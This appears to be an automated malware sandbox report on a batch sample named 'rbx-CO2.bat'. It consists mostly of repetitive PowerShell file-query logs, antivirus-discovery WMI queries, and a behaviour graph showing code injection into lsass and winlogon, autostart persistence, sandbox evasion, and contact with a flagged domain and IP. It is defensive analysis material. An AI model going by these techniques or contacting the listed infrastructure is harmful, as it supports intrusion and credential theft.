Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 38_2_0000000140002300
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC408090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 17_2_00000253FC408090
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.dr, Amcache.hve.11.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524982 Sample: rbx-CO2.bat Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 85 azure-winsecure.com 2->85 87 ipwho.is 2->87 101 Suricata IDS alerts for network traffic 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 .NET source code references suspicious native API functions 2->105 107 15 other signatures 2->107 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 137 Suspicious powershell command line found 13->137 139 Suspicious command line found 13->139 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 141 Writes to foreign memory regions 16->141 143 Modifies the context of a thread in another process (thread injection) 16->143 145 Injects a PE file into a foreign processes 16->145 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 81 C:\Windows\...\$rbx-CO2.bat:Zone.Identifier, ASCII 18->81 dropped 83 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, ASCII 18->83 dropped 109 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->109 111 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->111 113 Uses schtasks.exe or at.exe to add and modify task schedules 18->113 121 4 other signatures 18->121 32 cmd.exe 1 18->32         started        35 WerFault.exe 23 16 18->35         started        115 Injects code into the Windows Explorer (explorer.exe) 26->115 117 Contains functionality to inject code into remote processes 26->117 119 Writes to foreign memory regions 26->119 123 3 other signatures 26->123 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 19 other processes 26->43 signatures8 process9 signatures10 93 Suspicious powershell command line found 32->93 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        95 Writes to foreign memory regions 37->95 process11 process12 51 cmd.exe 1 45->51         started        signatures13 125 Suspicious powershell command line found 51->125 127 Suspicious command line found 51->127 54 powershell.exe 51->54         started        58 WMIC.exe 1 51->58         started        60 conhost.exe 51->60         started        62 4 other processes 51->62 process14 dnsIp15 89 azure-winsecure.com 154.216.20.132, 59172, 6969 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 54->89 91 ipwho.is 147.135.36.89, 443, 59173 OVHFR United States 54->91 129 Creates autostart registry keys with suspicious values (likely registry only malware) 54->129 131 Creates autostart registry keys with suspicious names 54->131 133 Creates an autostart registry key pointing to binary in C:\Windows 54->133 135 6 other signatures 54->135 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 97 Injects a PE file into a foreign processes 64->97 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 powershell.exe 64->77         started        99 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 67->99 79 conhost.exe 67->79         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.135.36.89
 ipwho.is United States
16276 OVHFR false
154.216.20.132
 azure-winsecure.com Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo true

Contacted Domains

Name IP Active
ipwho.is 147.135.36.89 true
azure-winsecure.com 154.216.20.132 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipwho.is/ false
    		unknown